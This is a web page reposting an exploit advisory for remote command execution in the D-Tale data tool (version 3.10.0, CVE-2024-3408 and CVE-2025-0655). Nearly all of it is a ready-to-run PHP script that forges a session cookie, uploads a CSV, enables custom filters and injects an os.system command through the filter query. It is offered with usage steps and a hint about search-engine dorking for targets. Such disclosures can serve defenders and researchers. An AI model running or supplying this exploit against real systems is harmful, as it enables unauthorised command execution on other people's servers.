Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

D Tale 3.10.0 Remote Command Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 29
=============================================================================================================================================
| # Title : D Tale =============================================================================================================================================
| # Title : D Tale v3.10.0 PHP code execution vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://pypi.org/project/dtale/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Exploiting D-Tale Remote Command Execution Vulnerability Using PHP

(Related : https://packetstorm.news/files/id/189509/ Linked CVE numbers: CVE-2024-3408, CVE-2025-0655 ) .

[+] save code as poc.php.

[+] Set Target = line 102

[+] Usage = php poc.php

[+] PayLoad :

<?php
class D_Tale_RCE_Exploit {

private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
private $target_url;
private $data_id;
private $payload;

public function __construct($target_url, $payload) {
$this->target_url = $target_url;
$this->payload = $payload;
}

// Function to send GET requests
private function send_get_request($uri, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

// Function to send POST requests
private function send_post_request($uri, $data, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

// Check for vulnerable version
public function check_vulnerability() {
$headers = ['Cookie: session=' . $this->session];
$response = $this->send_get_request('/dtale/popup/upload', $headers);

if (strpos($response, 'version') !== false) {
preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
return true;
}
}
return false;
}

// Exploit the vulnerability
public function exploit() {
// Step 1: Upload a CSV file to trigger the exploit
$mime_boundary = "---------------------------" . rand();
$data = "--$mime_boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
$data .= "Content-Type: text/csv\r\n\r\n";
$data .= "payload_data\r\n";
$data .= "--$mime_boundary--\r\n";

$headers = [
'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
'Cookie: session=' . $this->session
];

$response = $this->send_post_request('/dtale/upload', $data, $headers);

preg_match('/"data_id":"(.*?)"/', $response, $matches);
if (isset($matches[1])) {
$this->data_id = $matches[1];
echo "Data ID: " . $this->data_id . "\n";
} else {
echo "Failed to get data ID.\n";
return;
}

// Step 2: Enable custom filters
$settings = json_encode(['enable_custom_filters' => true]);
$this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);

// Step 3: Execute the payload via custom filter
$query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
$this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);

echo "Payload executed successfully.\n";
}

// Cleanup after exploit
public function cleanup() {
if ($this->data_id) {
$headers = ['Cookie: session=' . $this->session];
$this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
echo "Cleaned up the dataset.\n";
}
}
}

// Usage
$target_url = 'http://target.site.com';
$payload = 'id'; // Example payload

$exploit = new D_Tale_RCE_Exploit($target_url, $payload);

if ($exploit->check_vulnerability()) {
echo "Vulnerable version detected. Exploiting...\n";
$exploit->exploit();
$exploit->cleanup();
} else {
echo "Target is not vulnerable.\n";
}
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================